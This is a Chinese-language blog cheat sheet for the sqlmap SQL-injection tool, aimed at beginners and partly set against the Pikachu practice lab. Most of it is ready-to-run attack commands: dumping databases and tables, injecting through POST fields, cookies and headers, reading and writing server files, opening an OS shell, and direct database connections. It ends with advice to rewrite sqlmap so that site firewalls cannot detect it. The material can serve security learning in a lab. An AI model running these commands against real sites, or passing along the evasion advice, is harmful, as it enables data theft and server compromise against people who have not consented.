@[TOC](SQL注入工具使用)
## 菜鸟的自我反思
*一个合格的菜鸟应该知道自己该干什么，不该干什么。作为一个web安全的菜鸟，刚开始的时候应该以工具入手，但这远远不是终点。工具是死的，而人的思维是灵活的。从工具入手，提升个人渗透的乐趣，在进一步理解原理进行魔改。*
## sqlmap常用指令

### 爆破与提升
**常规爆破命令：**
*sqlmap -u "目标网址" --dbs
sqlmap -u[^1] "目标网址" -D [数据库名] --tables
sqlmap -u "目标网址" -D [数据库名] -T [表名] --columns
sqlmap -u "目标网址" -D [数据库名] -T [表名] -C [列名] --dump*
[^1]:url地址、-D-->Database、-T-->Table、-C-->Column、--dump-->获取表中所有数据

**提升部分：**
*指定报错注入，并加入多线程--GET
sqlmap -u "目标网址" --dbs --batch --threads[^1] 10 --technique E*
[^1]:--bach-->无脑yes，--threads设置线程，多线程进行注入，在时间注入、布尔盲注提高效率（后期会讲到）。设置线程太多也不好，因为线程越多，服务端的压力越大，可能会导致响应速度大幅度降低甚至出现丢包现象，导致请求无响应。所以Sqlmap最大只能设置10个线程。

*指定报错注入，并加入多线程--POST--密码登录
sqlmap -u "目标网址" --data "uname=123*&password=123&submit=submit" --dbs --batch --threads 10 --technique E*

*指定报错注入，并加入多线程--POST--cookie免密登录
sqlmap --cookie="xxx" -u "目标网址" --dbs --batch --threads 10 --technique E*

*http头注入或写入指定注入部分
burp抓包，要攻击的地方
sqlmap -r "./a.txt" --dbs --threads 10 --batch --technique BETS（四种注入方式）
sqlmap -u "目标网址" --user-agent="xxx*" --level 4 --dbs --threads 10 --batch --technique BETS*

*读取文件
Sqlmap -u "http://pikachu.com/vul/sqli/sqli_str.php?name=a&submit=submit" --file-read "c:/a.txt"
写入文件
Sqlmap -u "http://pikachu.com/vul/sqli/sqli_str.php?name=a&submit=submit"  --file-write "1.txt" --file-dest "c:/123.txt"**


### 注入os-shell
执行os-shell
注意！！！！！你必须确认你网站的路径
sqlmap -u "http://pikachu.com/vul/sqli/sqli_str.php?name=a&submit=submit" --os-shell
sqlmap --os-shell执行原理（mysql篇） - 小明-o3rr0r - 博客园 (cnblogs.com)

### 连接数据库
连接数据库执行数据库shell命令
Sqlmap[^1] -d mysql://[数据库用户名]:[密码]@127.0.0.1:3306/haha --sql-shell
sqlmap -d mysql://root:root@localhost:3306/test -f --banner
[^1]:-d：直连数据库，后面跟着连接信息 -> mysql://用户名:密码@主机名:端口/数据库
-f：打印DBMS信息
--banner：打印banner信息，准确的版本号
-C：指定字段
## 后期建议

1、正常网站都会有防火墙，会识别sqlmap等sql注入工具的特征码，所以后期使用python、java等语言重写sqlmap是必要的
2、这些类型的注入漏洞对应着sqlmap目录下data文件夹下的xml文件
